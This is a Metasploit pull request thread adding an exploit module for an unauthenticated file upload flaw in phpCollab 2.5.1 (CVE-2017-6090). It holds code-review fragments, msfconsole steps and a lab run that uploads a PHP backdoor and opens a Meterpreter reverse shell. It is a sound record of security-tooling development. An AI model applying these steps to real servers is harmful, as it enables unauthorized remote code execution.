Add CVE-2017-6090 phpCollab 2.5.1 file upload exploit module
rapid7/metasploit-framework pull request #9325
Opened 2017-12-20 14:17 UTC by l00ph0le

Add CVE-2017-6090 phpCollab 2.5.1 file upload exploit module

## Verification
Homepage:http://www.phpcollab.com/

Exploit-DB: https://www.exploit-db.com/exploits/42934/

1. Download vulnerable app from the exploit db page (https://www.exploit-db.com/apps/dda41c5b541d7adc0b50b1fcf3bf7519-phpCollab-v2.5.1.zip)
NOTE: phpCollab 2.5.1 would not install/work on php7, I had to use php5. 
2. Follow install instructions (http://phpcollab.com/documentation/install.htm)

List the steps needed to make sure this thing works
- [ ] Start `msfconsole`
- [ ] `use exploit/unix/webapp/phpcollab_upload_exec`
- [ ] `set RHOST 192.168.246.144`
- [ ] `set TARGETURI /phpcollab/`
- [ ] `exploit`

## Example Output
![phpcollabexploit](https://user-images.githubusercontent.com/5595174/34211104-0f1ccb6a-e566-11e7-8c9b-c3733713fbf4.png)

2017-12-20 18:35 UTC, h00die requested changes

2017-12-20 18:35 UTC, h00die commented on modules/exploits/unix/webapp/phpcollab_upload_exec.rb
> +      'Name'           => 'phpCollab 2.5.1 Unauthenticated File Upload Vulnerability',
I think vulnerability can be removed from the title

2017-12-20 18:35 UTC, h00die commented on modules/exploits/unix/webapp/phpcollab_upload_exec.rb
> +          [ 'URL', 'https://www.exploit-db.com/exploits/42934/' ],
There's an 'EDB' reference you can use instead of url

2017-12-20 18:35 UTC, h00die commented on modules/exploits/unix/webapp/phpcollab_upload_exec.rb
> +    filename = '1.php'
File name should be randomized

2017-12-20 18:35 UTC, h00die commented on modules/exploits/unix/webapp/phpcollab_upload_exec.rb
> +    print_status("Trigging the exploit...")
Trigging?

2017-12-20 18:35 UTC, h00die commented on modules/exploits/unix/webapp/phpcollab_upload_exec.rb
> +      'uri'     => normalize_uri(target_uri.path, "logos_clients/1.php")
Will also need to be adjusted to the random file name

2017-12-20 18:35 UTC, h00die commented
Please add docs as well.

2017-12-20 19:06 UTC, l00ph0le commented on modules/exploits/unix/webapp/phpcollab_upload_exec.rb
> +    filename = '1.php'
I am a total newbie, and appreciate your help. I started with a randomized filename in the beginning, but I found out using burp suite that the shell file is named after the "id" parameter in the post url. The "id" parameter has to be set to "1" for the upload to work.

Do you have any suggestions on what to do in that scenario?

2017-12-20 19:44 UTC, l00ph0le commented on modules/exploits/unix/webapp/phpcollab_upload_exec.rb
> +    filename = '1.php'
Actually disregard. I figured out a way to randomize the name. The first two characters have to be "1."

2017-12-24 02:20 UTC, l00ph0le commented
Made suggested changes and added documentation.

2018-01-10 06:41 UTC, bcoles commented on modules/exploits/unix/webapp/phpcollab_upload_exec.rb
> +          [ 'URL', 'http://www.phpcollab.com/' ],
It would be nice to include the CVE and URL to the original advisory:

```ruby
[ 'CVE', '2017-6090'],
[ 'URL', 'https://sysdream.com/news/lab/2017-09-29-cve-2017-6090-phpcollab-2-5-1-arbitrary-file-upload-unauthenticated/']
```

2018-01-10 06:41 UTC, bcoles commented on modules/exploits/unix/webapp/phpcollab_upload_exec.rb
> +    if res && res.body.include?('PhpCollab v2.5.1')
[Allegedly](https://sysdream.com/news/lab/2017-09-29-cve-2017-6090-phpcollab-2-5-1-arbitrary-file-upload-unauthenticated/) CVE-2017-6090 affects all versions of PhpCollab up to an including 2.5.1. Have you tested other versions?

2018-01-10 06:41 UTC, bcoles commented on modules/exploits/unix/webapp/phpcollab_upload_exec.rb
> +      return Exploit::CheckCode::Appears
If you fancy some code golfing, `Exploit::CheckCode::Appears` can be replaced with `CheckCode::Appears`

2018-01-10 06:41 UTC, bcoles commented on modules/exploits/unix/webapp/phpcollab_upload_exec.rb
> +    return Exploit::CheckCode::Safe
If you fancy some code golfing, `Exploit::CheckCode::Safe` can be replaced with `CheckCode::Safe`

Also, `return` is redundant here

2018-01-10 06:41 UTC, bcoles commented on modules/exploits/unix/webapp/phpcollab_upload_exec.rb
> +    filename = '1.' + rand_text_alpha(8 + rand(4)) + '.php'
Does it have to be `1.` ? Can this be randomized ?

2018-01-10 06:41 UTC, bcoles commented on modules/exploits/unix/webapp/phpcollab_upload_exec.rb
> +      'uri'      => normalize_uri(target_uri.path, "clients/editclient.php?id=" + id + "&action=update"),
`vars_get` is preferred.

```ruby
    res = send_request_cgi({
      'method'   => 'POST',
      'uri'      => normalize_uri(target_uri.path, 'clients/editclient.php'),
      'vars_get' => {
        'id'     => id,
        'action' => 'update'
      },
      'ctype'    => "multipart/form-data; boundary=#{data.bound}",
      'data'     => data.to_s
     })
```

2018-01-10 06:41 UTC, bcoles commented on modules/exploits/unix/webapp/phpcollab_upload_exec.rb
> +          'DisableNops' => true
Pretty sure `DisableNops` is redundant for PHP file uploads.

2018-01-10 06:50 UTC, wvu-r7 commented on modules/exploits/unix/webapp/phpcollab_upload_exec.rb
> +          'DisableNops' => true
It is often copied but does not apply.

2018-01-10 06:52 UTC, wvu-r7 commented on modules/exploits/unix/webapp/phpcollab_upload_exec.rb
> +    if res && res.body.include?('PhpCollab v2.5.1')
`Gem::Version` may be useful here.

2018-01-10 23:28 UTC, wchen-r7 commented
Exploit works as advertised.

```
msf exploit(unix/webapp/phpcollab_upload_exec) > check
[*] 172.16.249.205:80 The target appears to be vulnerable.
msf exploit(unix/webapp/phpcollab_upload_exec) > run

[*] Started reverse TCP handler on 172.16.249.1:4444 
[*] Uploading backdoor file: 1.dfUmMUJtm.php
[+] Backdoor successfully created.
[*] Triggering the exploit...
[*] Sending stage (37543 bytes) to 172.16.249.205
[*] Meterpreter session 1 opened (172.16.249.1:4444 -> 172.16.249.205:36886) at 2018-01-10 17:27:07 -0600
[+] Deleted 1.dfUmMUJtm.php

meterpreter > 
```

I'll fix up other things suggested by other people before I land this PR. Thank you for waiting @l00ph0le

2018-01-10 23:36 UTC, wchen-r7 commented on modules/exploits/unix/webapp/phpcollab_upload_exec.rb
> +    filename = '1.' + rand_text_alpha(8 + rand(4)) + '.php'
According to the author from a different reply:

> I am a total newbie, and appreciate your help. I started with a randomized filename in the beginning, but I found out using burp suite that the shell file is named after the "id" parameter in the post url. The "id" parameter has to be set to "1" for the upload to work.

2018-01-10 23:38 UTC, wchen-r7 commented
I have addressed all the comments by @bcoles, and I will be landing this PR now.

Thank you @bcoles !

2018-01-10 23:40 UTC, merged

2018-01-10 23:44 UTC, wchen-r7 commented
# Release Notes

This module exploits an arbitrary file upload vulnerability against phpCollab 2.5.1. The editclient code allows a remote user to upload an arbitrary file to the logos_clients directory, which can be abused to upload a payload in order to gain arbitrary remote code execution.

2018-01-11 02:32 UTC, l00ph0le commented
Thank you help everyone!